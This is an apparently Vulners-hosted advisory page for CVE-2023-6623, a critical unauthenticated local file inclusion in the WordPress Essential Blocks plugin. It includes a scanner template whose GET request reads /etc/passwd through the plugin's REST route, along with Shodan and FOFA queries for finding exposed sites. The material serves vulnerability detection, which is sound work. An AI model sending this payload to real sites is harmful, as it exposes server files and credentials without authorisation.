| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2023-6623 | 15 Jan 202417:27 | – | circl | |
| WordPress Plugin Essential Blocks Security Vulnerability | 15 Jan 202400:00 | – | cnnvd | |
| CVE-2023-6623 | 15 Jan 202415:10 | – | cve | |
| CVE-2023-6623 Essential Blocks < 4.4.3 - Unauthenticated Local File Inclusion | 15 Jan 202415:10 | – | cvelist | |
| CVE-2023-6623 | 15 Jan 202416:15 | – | nvd | |
| CVE-2023-6623 | 15 Jan 202416:15 | – | osv | |
| WordPress Essential Blocks plugin < 4.4.3 - Unauthenticated Local File Inclusion vulnerability | 6 Feb 202606:17 | – | patchstack | |
| Design/Logic Flaw | 15 Jan 202416:15 | – | prion | |
| PT-2023-32722 · WordPress · Essential Blocks | 23 Dec 202300:00 | – | ptsecurity | |
| CVE-2023-6623 | 23 May 202504:57 | – | redhatcve |
id: CVE-2023-6623
info:
name: Essential Blocks < 4.4.3 - Local File Inclusion
author: iamnoooob,rootxharsh,pdresearch,coldfish
severity: critical
description: |
Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
impact: |
An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
remediation: |
Upgrade to the latest version of Essential Blocks 4.4.3 to fix this issue.
reference:
- https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/
- https://flysec-blog.blogspot.com/2024/01/cve-2023-6623-file-inclusion.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6623
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6623
cwe-id: CWE-22
epss-score: 0.50673
epss-percentile: 0.98784
cpe: cpe:2.3:a:wpdeveloper:essential_blocks:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wpdeveloper
product: essential_blocks
framework: wordpress
shodan-query: http.html:/wp-content/plugins/essential-blocks/
fofa-query: body=/wp-content/plugins/essential-blocks/
publicwww-query: "/wp-content/plugins/essential-blocks/"
tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper,vkev,vuln
http:
- method: GET
path:
- '{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}'
- '{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt'
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "regex('root:.*:0:0:', body_1)"
- 'contains(body_2, "Essential Blocks – Page")'
condition: and
# digest: 4a0a00473045022075eef36ef7a9c3be4e4364a0b5cb3b34506481c89a79d073f0fa15f75f9f243d0221009a07d6d9a8b67783ebcf699e2c26def55b2ad1c59bcb72486235c4c31ca7432f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation